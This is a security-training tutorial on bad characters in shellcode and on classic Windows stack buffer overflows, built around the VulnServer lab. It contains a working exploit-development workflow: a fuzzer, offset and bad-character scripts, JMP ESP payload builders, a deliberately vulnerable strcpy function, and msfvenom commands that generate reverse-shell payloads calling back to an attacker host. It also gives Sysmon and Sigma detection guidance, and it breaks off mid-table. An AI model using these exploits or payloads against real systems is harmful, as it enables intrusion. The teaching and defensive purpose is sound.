Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.


1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: it corrupts, truncates, or transforms the payload before it lands in the destination buffer. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets as control data, such as a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, and sprintf operate on null-terminated buffers and stop at \x00, while the deprecated gets stops at a newline.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

  • Missing bytes — characters stripped entirely by a sanitiser.
  • Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
  • Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.
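
The three failure modes can be told apart mechanically once the bytes that actually landed have been copied out of the debugger. The sketch below is a rough illustration, not a replacement for a debugger plugin; the function name classify and the assumption that observed has been trimmed to exactly the bytes the copy wrote are both hypothetical.

```python
def classify(sent: bytes, observed: bytes) -> str:
    """Roughly label how `observed` differs from `sent`.

    Assumes `observed` holds only the bytes the target wrote,
    with no trailing stack garbage.
    """
    if observed == sent:
        return "intact"
    if sent.startswith(observed):
        return "truncated"   # copy stopped early; the tail was never written
    if len(observed) == len(sent):
        return "altered"     # same length, at least one byte value changed
    if len(observed) < len(sent):
        return "missing"     # a byte was stripped and later bytes shifted down
    return "expanded"        # a transformation added bytes


sent = bytes(range(1, 9))
print(classify(sent, sent[:3]))                        # truncated
print(classify(sent, sent.replace(b"\x04", b"")))      # missing
print(classify(sent, sent.replace(b"\x04", b"\x20")))  # altered
```

A real dump usually mixes these modes, which is why the enumeration is repeated one confirmed byte at a time.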


Figure: Three distinct ways a bad character corrupts a payload as it passes through a string API, before it reaches the destination buffer: missing bytes, altered bytes, and premature truncation.

2. Why \x00 Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

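Function | Behavior on \x00
strcpy | Stops copying at the first null
strncpy | Stops at the first null or after n bytes, whichever comes first
strlen | Returns the length up to the first null
sprintf | Terminates the formatted string; a %s argument is read only up to its first null
gets | Legacy, present in old targets; reads up to a newline, so a null passes through it but truncates any later string operation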

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call is length-based: it reads up to the requested number of bytes and passes null bytes from the wire into the buffer unchanged. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
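
The two layers can be modelled separately to make the distinction concrete. This is a toy simulation in Python, not the real APIs: recv_layer and strcpy_layer are hypothetical names standing in for a length-based read and a null-terminated copy.

```python
def recv_layer(wire: bytes, max_bytes: int) -> bytes:
    """Model of a length-based read: copies up to max_bytes, nulls included."""
    return wire[:max_bytes]


def strcpy_layer(src: bytes) -> bytes:
    """Model of strcpy: copies up to, but not including, the first null byte."""
    return src.split(b"\x00", 1)[0]


wire = b"AAAA\x00BBBB"
received = recv_layer(wire, 1024)   # the null survives the transport layer
copied = strcpy_layer(received)     # everything after the null is lost

print(received)  # b'AAAA\x00BBBB'
print(copied)    # b'AAAA'
```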


3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte | Hex | Reason
Null | \x00 | String terminator; always bad in string overflows
Line Feed | \x0A | Newline; terminates input in many protocol parsers
Carriage Return | \x0D | CR; terminates input lines (HTTP, SMTP, POP3)
Space | \x20 | Whitespace delimiter; terminates tokens in some parsers
0xFF | \xFF | Causes issues in some parsing contexts (for example, Telnet treats it as the IAC command byte)

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
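
A restricted set is easiest to reason about as an allowlist. The sketch below reports which offsets of a candidate input fall outside a set of permitted byte values; the same check works at a validation boundary on the defensive side. The allowlist shown (printable ASCII without the space) is a hypothetical example, not the rule set of any particular server.

```python
# Hypothetical allowlist: printable ASCII, space excluded.
PRINTABLE = frozenset(range(0x21, 0x7F))


def find_violations(payload: bytes, allowed: frozenset) -> list:
    """Return (offset, byte) pairs for every byte outside the allowed set."""
    return [(i, b) for i, b in enumerate(payload) if b not in allowed]


for offset, value in find_violations(b"GET\r\n", PRINTABLE):
    print(f"offset {offset}: \\x{value:02x} not permitted")
```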


4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.


5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
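!mona compare -f c:\mona\<process_name>\bytearray.bin -a <ESP_address>

  • !mona config sets the output directory; %p expands to the name of the process being debugged, so the reference file lands in a per-process subfolder.
  • !mona bytearray -cpb "\x00" writes a reference bytearray.bin containing every byte value except the specified bad chars (here, \x01–\xFF).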
  • !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.
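
The "first offender only" rule is simple to encode when the memory dump has been copied out as bytes. A minimal sketch, assuming a hypothetical helper named first_divergence and an observed buffer taken from the debugger's hex dump:

```python
def first_divergence(expected: bytes, observed: bytes):
    """Return (offset, expected_byte) at the first mismatch, or None if intact."""
    for i, want in enumerate(expected):
        if i >= len(observed) or observed[i] != want:
            return i, want
    return None


expected = bytes([0x11, 0x12, 0x13, 0x14, 0x15, 0x16])
observed = bytes([0x11, 0x12, 0x13, 0x15, 0x16])   # \x14 was dropped

hit = first_divergence(expected, observed)
if hit is not None:
    offset, value = hit
    print(f"confirmed bad byte \\x{value:02x} at offset {offset}")
```

Only the returned byte goes onto the exclusion list; everything after it is re-tested on the next pass.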


Figure: The iterative bad-character elimination loop (generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list). Only the first byte of a corrupted run is confirmed bad; repeat the loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom’s -b flag specifies the forbidden bytes; it then picks an encoder (x86/shikata_ga_nai by default for x86 payloads) to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.
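
Whatever encoder is chosen, it is worth checking the generated bytes against the confirmed list before they go anywhere near the target, and keeping the -b and -cpb strings generated from one source of truth. The helpers below are a sketch; format_badchars and offending_bytes are hypothetical names, and the sample blob is inert filler rather than encoder output.

```python
def format_badchars(badchars: bytes) -> str:
    """Render a bad-char list in the \\xNN form used by -b and -cpb."""
    return "".join(f"\\x{b:02x}" for b in sorted(set(badchars)))


def offending_bytes(blob: bytes, badchars: bytes) -> list:
    """Return (offset, byte) pairs where blob contains a forbidden byte."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(blob) if b in bad]


BADCHARS = b"\x00\x0a\x0d\x20"
blob = b"\x90\x90\x0a\x90"          # inert filler with one deliberate violation

print(format_badchars(BADCHARS))     # \x00\x0a\x0d\x20
print(offending_bytes(blob, BADCHARS))
```

An empty list from offending_bytes is the condition to require before the payload is placed in the buffer.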


Figure: msfvenom encoder selection is driven by the bad-char list: shikata_ga_nai as the default, call4_dword_xor as a fallback, and alpha_mixed for printable-only constraints. Escalate through the fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit mixed-case alphanumeric shellcode, which stays inside the \x21–\x7E printable range. This is ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub, which itself contains non-alphanumeric bytes. The trade-off is size: an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
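
A quick way to confirm that generated output really meets a printable-only or alphanumeric-only constraint is to test every byte against the permitted range. A minimal sketch; the function names are hypothetical and the sample inputs are arbitrary strings, not encoder output.

```python
import string

ALNUM = frozenset((string.ascii_letters + string.digits).encode())


def is_alphanumeric(blob: bytes) -> bool:
    """True if every byte is 0-9, A-Z, or a-z."""
    return len(blob) > 0 and all(b in ALNUM for b in blob)


def is_printable(blob: bytes) -> bool:
    """True if every byte lies in the printable range 0x21 to 0x7E."""
    return len(blob) > 0 and all(0x21 <= b <= 0x7E for b in blob)


print(is_alphanumeric(b"PYIIIIII"))   # True
print(is_alphanumeric(b"a-b"))        # False: '-' is printable but not alphanumeric
print(is_printable(b"a-b"))           # True
```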


9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

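Instruction | Opcode bytes | Notes
JMP SHORT +6 | \xEB \x06 | \xEB often restricted
JE / JNE pair | \x74 .. \x75 .. | Complementary conditions, so exactly one of the two branches is always taken
Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad; note that the 32-bit displacement of a small forward jump contains \x00 bytes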

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here
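
The displacement arithmetic for the pair is easy to get wrong, because a rel8 displacement is measured from the end of each instruction and the two instructions sit at different addresses. The sketch below encodes the pair for a given gap; je_jne_pair is a hypothetical helper name, and gap means the number of bytes to skip after the end of the four-byte pair.

```python
def je_jne_pair(gap: int) -> bytes:
    """Encode `je` then `jne`, both landing `gap` bytes past the end of the pair.

    The je is followed by the 2-byte jne, so its displacement is gap + 2;
    the jne is the last instruction of the pair, so its displacement is gap.
    """
    if not 0 <= gap <= 125:          # gap + 2 must fit in a positive rel8
        raise ValueError("gap out of range for a short forward branch")
    return bytes([0x74, gap + 2, 0x75, gap])


pair = je_jne_pair(4)
print(pair.hex(" "))   # 74 06 75 04
```

The displacement bytes themselves must also be checked against the bad-char list, since a gap of 8 or 11 would reintroduce \x0a or \x0d.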

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the SE handler pointer into the shellcode, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.


10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and, for ASCII-range input, effectively inserting a null after every byte. This breaks shellcode alignment entirely: it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- a \x00 inserted after every byte
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode, manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
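
Spotting the interleave can be automated. The sketch below models the widening for ASCII-range input using Python's UTF-16LE codec and flags a dump whose odd offsets are all zero. Both function names are hypothetical, and the model deliberately covers only bytes up to 0x7F, since higher bytes are mapped through the active code page on a real system.

```python
def expand_ascii(data: bytes) -> bytes:
    """Model the widening of ASCII-range bytes to UTF-16LE.

    Raises UnicodeDecodeError for bytes above 0x7F, which this model
    does not attempt to cover.
    """
    return data.decode("ascii").encode("utf-16-le")


def looks_wide(observed: bytes, min_pairs: int = 4) -> bool:
    """True if every odd-offset byte is a null over at least min_pairs pairs."""
    if len(observed) < 2 * min_pairs:
        return False
    usable = observed[: len(observed) - len(observed) % 2]
    return all(b == 0 for b in usable[1::2]) and any(usable[0::2])


print(expand_ascii(b"\x41\x42"))               # b'A\x00B\x00'
print(looks_wide(expand_ascii(b"ABCDEFGH")))   # True
print(looks_wide(b"ABCDEFGH"))                 # False
```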


11. Common Attacker Techniques

Technique | Description
Bad-char enumeration | Inject \x01–\xFF, diff memory, identify forbidden bytes
Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes
Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints
Jump substitution | Replace \xEB with JE/JNE pairs or near JMP
Venetian shellcode | Survive Unicode expansion in wide-character buffers
Egghunter staging | Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.


12. Defensive Strategies & Detection

Bad-char testing itself leaves little telemetry beyond repeated service crashes, but the encoded shellcode it produces is loud once it executes from unbacked memory. The Sysmon events below are the most relevant.

Event ID | Name | Relevance
1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads
3 | Network Connection | Outbound C2 from an exploited process
8 | CreateRemoteThread | Post-exploitation thread injection
10 | ProcessAccess | Cross-process open by injected payload
11 | FileCreate | Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
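
The rule's logic can be prototyped against exported events before it is deployed to a SIEM. The sketch below applies the same three conditions to an event already parsed into a dictionary. The field names follow the rule above; the sample event, including its process path and CallTrace string, is invented for illustration.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event: dict) -> bool:
    """Apply the rule's selection: EID 10, listed access mask, UNKNOWN frame."""
    return (
        str(event.get("EventID")) == "10"
        and str(event.get("GrantedAccess", "")).lower() in SUSPICIOUS_ACCESS
        and "UNKNOWN" in str(event.get("CallTrace", ""))
    )


# Hypothetical event, shaped like a parsed Sysmon ProcessAccess record.
sample = {
    "EventID": 10,
    "SourceImage": r"C:\lab\vulnservice.exe",
    "GrantedAccess": "0x1F3FFF",
    "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(0000000000A51A30)",
}

print(matches_rule(sample))   # True
```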

Additional telemetry and hardening:

  • ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
  • Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
  • WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
  • Compiler and linker mitigations (/GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT) raise the exploitation bar.
  • Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
  • WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
  • Memory integrity — flag executable pages not backed by a known on-disk image.
  • Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Figure: Defence-in-depth layers each intercept exploitation at a different stage: network WAF, OS mitigations such as DEP and CFG, Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and Security Event 4688 process-creation logging. Encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

Tool | Description | Link
Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com
mona.py | Bytearray generation and memory comparison | github.com/corelan
WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com
msfvenom | Shellcode generation and encoding (-b) | offsec.com
Alpha2 | Standalone alphanumeric shellcode encoder | github.com
x64dbg | User-mode debugging and patching | x64dbg.com
Ghidra | Static opcode/disassembly analysis | ghidra-sre.org
Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches
Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations
Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior
Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire
Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace

Summary

  • Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it lands in memory; enumerate them empirically, never assume.
  • \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
  • Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
  • Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
  • Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
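
The byte ordering can be checked with Python's standard struct module, where "<I" means a little-endian unsigned 32-bit integer. The address is the illustrative one from the paragraph above.

```python
import struct

addr = 0x625011AF
packed = struct.pack("<I", addr)               # least significant byte first
unpacked = struct.unpack("<I", packed)[0]      # round-trip back to the integer

print(packed.hex(" "))    # af 11 50 62
print(hex(unpacked))      # 0x625011af
```

Reading a dword out of a hex dump is the same operation in reverse, which is why addresses in a memory view appear "backwards".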


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack Slot | Description
Function arguments | Pushed by caller before CALL
Saved EIP (return address) | Pushed implicitly by the CALL instruction
Saved EBP | Pushed by callee prologue (PUSH EBP)
/GS stack cookie (if present) | Inserted between locals and saved EBP/EIP
Local variables / buffers | Allocated by SUB ESP, N
ESP (stack top) | Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.
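
The cookie arithmetic in the listing above reduces to two XOR operations, which can be modelled directly. This is a sketch of the logic only; the master cookie and EBP values are made up, and the function names are hypothetical.

```python
MASK = 0xFFFFFFFF   # keep results within 32 bits


def prologue_store(master_cookie: int, ebp: int) -> int:
    """Value the prologue writes at [ebp-4]: master cookie XOR frame pointer."""
    return (master_cookie ^ ebp) & MASK


def epilogue_check(stored: int, ebp: int, master_cookie: int) -> bool:
    """Epilogue logic: undo the XOR and compare against the master cookie."""
    return ((stored ^ ebp) & MASK) == master_cookie


master = 0x1234ABCD      # hypothetical per-process cookie
ebp = 0x0019FF70         # hypothetical frame pointer

stored = prologue_store(master, ebp)
print(epilogue_check(stored, ebp, master))        # True: frame untouched
print(epilogue_check(0x41414141, ebp, master))    # False: slot overwritten with 'AAAA'
```

Tying the stored value to EBP means a cookie leaked from one frame does not validate in a frame at a different address.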


Figure: A standard x86 cdecl stack frame, from high to low address: function arguments, saved return EIP, saved EBP, /GS cookie, local buffer, ESP. The saved return EIP sits just above the saved EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

Identifier | What it does
strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking; classic root causes
memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.
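
The overwrite order can be modelled with a bytearray standing in for the frame. This is a simplified sketch for reasoning about offsets, not a picture of any specific build: it assumes no cookie and no compiler padding, so the saved EBP sits at offset 64 and the saved EIP at offset 68, and the saved values are invented.

```python
BUF_SIZE = 64
EBP_OFF, EIP_OFF = BUF_SIZE, BUF_SIZE + 4   # assumes no cookie and no padding


def new_frame() -> bytearray:
    """64-byte buffer followed by a saved EBP and a saved EIP (hypothetical values)."""
    frame = bytearray(BUF_SIZE + 8)
    frame[EBP_OFF:EBP_OFF + 4] = (0x0019FF80).to_bytes(4, "little")
    frame[EIP_OFF:EIP_OFF + 4] = (0x00401234).to_bytes(4, "little")
    return frame


def unchecked_copy(frame: bytearray, src: bytes) -> None:
    """Model of strcpy into offset 0: copy up to the first null, then a terminator."""
    data = src.split(b"\x00", 1)[0] + b"\x00"
    data = data[: len(frame)]               # the model ends at the top of the frame
    frame[: len(data)] = data


def saved_eip(frame: bytearray) -> int:
    return int.from_bytes(frame[EIP_OFF:EIP_OFF + 4], "little")


safe = new_frame()
unchecked_copy(safe, b"A" * 10)
smashed = new_frame()
unchecked_copy(smashed, b"A" * 72)

print(hex(saved_eip(safe)))      # 0x401234
print(hex(saved_eip(smashed)))   # 0x41414141
```

In a real binary the distance from the buffer to the return address must be measured, which is the purpose of the offset-discovery step in the methodology.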


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break

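Offset discovery with a cyclic pattern. The pattern and the lookup must come from the same tool: a value read from a pwntools pattern is resolved with cyclic_find, while a pattern from !mona pattern_create is resolved with !mona pattern_offset or !mona findmsp.

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash ...
# Stand-in for the observed value: the four pattern bytes at offset 2003 (illustrative)
eip_value = int.from_bytes(pattern[2003:2007], "little")
offset = cyclic_find(eip_value)        # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")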
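
For patterns in the Aa0Aa1Aa2 style produced by !mona pattern_create and Metasploit's pattern_create, the lookup can be reproduced with the standard library alone. The sketch below is a minimal reimplementation for illustration, with hypothetical function names; it is not the code those tools ship.

```python
import itertools
import string


def pattern_create(length: int) -> bytes:
    """Build an Aa0Aa1Aa2... pattern (upper, lower, digit triples)."""
    out = bytearray()
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    for upper, lower, digit in triples:
        if len(out) >= length:
            break
        out += f"{upper}{lower}{digit}".encode()
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 8192) -> int:
    """Offset of the 4 bytes seen in EIP (little-endian), or -1 if absent."""
    needle = eip_value.to_bytes(4, "little")
    return pattern_create(length).find(needle)


print(pattern_create(12))                  # b'Aa0Aa1Aa2Aa3'
print(pattern_offset(0x386F4337, 3000))    # 2003
```

The value 0x386F4337 is the four bytes "7Co8" read as a little-endian dword, which sit at offset 2003 of this pattern.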

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(range(1, 256))              # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytes | Instruction | Use
FF E4 | JMP ESP | Classic return trampoline
FF D4 | CALL ESP | Equivalent effect
FF E5 | JMP EBP | When EBP points near the buffer
EB 06 | Short JMP +6 | Next-SEH jump-over gadget

Once RET pops the overwritten return address, ESP points at the bytes immediately after it in the attacker’s buffer, so returning into JMP ESP pivots execution straight into the NOP sled and shellcode.


Figure: The six-step Windows stack overflow exploit development methodology. The loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

Mitigation | Mechanism | Bypass vector (teaching)
